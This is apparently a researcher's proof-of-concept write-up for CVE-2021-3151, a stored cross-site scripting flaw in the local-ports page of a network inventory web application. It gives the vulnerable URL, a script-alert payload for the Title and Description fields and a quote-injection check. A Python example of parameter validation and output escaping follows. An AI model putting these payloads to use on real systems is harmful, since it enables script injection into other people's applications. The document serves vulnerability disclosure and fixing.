CVE-2021-3151

On the next day: Description and usage =)


Reproduce

Vulnerable page in the Infrastructure section

  • Network
    • local ports

Vulnerable (Infrastructure) section

Parameter:

viewMode (Infrastructure, Object, Network > local ports = XSS symbol {'})

  • URL
http://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1

Insert the simple payload: =)

	Title:       <script>alert("nu11secur1ty_is_here");</script>
	Description: <script>alert("nu11secur1ty_is_here");</script>

Click on the save button

  • screen

Manually checking the Payload:

http://192.168.1.2/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27
  • result

Parameter:

viewMode (Infrastructure, Object, Network > local ports = XSS symbol {'})

Run the poc.py automated script to check if your Payload is working

python3 poc.py
  • result

Proof

BR
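
For the fixing side, an added example (not code from this repository or from the affected product): the two server-side controls that stop what is reproduced above, strict integer validation of the query parameters seen in the URLs and HTML-escaping of the stored Title and Description on output. The parameter allow-list, the function names and the table-row markup are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Parameter names are taken from the URLs on this page. Treating every one of
# them as an unsigned integer is an assumption based on the values shown there.
NUMERIC_PARAMS = {"viewMode", "tvMode", "tvType", "objID", "catgID",
                  "objTypeID", "cateID", "editMode"}


def validate_query(url):
    """Return {name: int} for a request URL, or raise ValueError."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    clean = {}
    for name, values in params.items():
        if name not in NUMERIC_PARAMS:
            raise ValueError(f"unexpected parameter: {name!r}")
        if len(values) != 1:
            raise ValueError(f"repeated parameter: {name!r}")
        value = values[0]
        # isdigit() alone accepts non-ASCII digits, so require ASCII as well.
        if not (value.isascii() and value.isdigit()):
            raise ValueError(f"non-numeric value for {name!r}: {value!r}")
        clean[name] = int(value)
    return clean


def is_rejected(url):
    """True when the URL fails validation (e.g. catgID=41%27 decodes to 41')."""
    try:
        validate_query(url)
        return False
    except ValueError:
        return True


def render_port_row(title, description):
    """Render stored Title/Description as text, never as markup (hypothetical row)."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(title, quote=True), html.escape(description, quote=True))


if __name__ == "__main__":
    # The two URLs and the field value below are the ones shown on this page.
    print(validate_query("http://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1"
                         "&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1"))
    print(is_rejected("http://192.168.1.2/index.php?viewMode=1002&tvMode=1006"
                      "&tvType=1&objID=26&catgID=41%27"))
    stored = '<script>alert("nu11secur1ty_is_here");</script>'
    print(render_port_row(stored, stored))
```

Validation and output encoding are complementary: the first rejects the quote appended to `catgID`, the second neutralises values that were already saved before a fix was deployed.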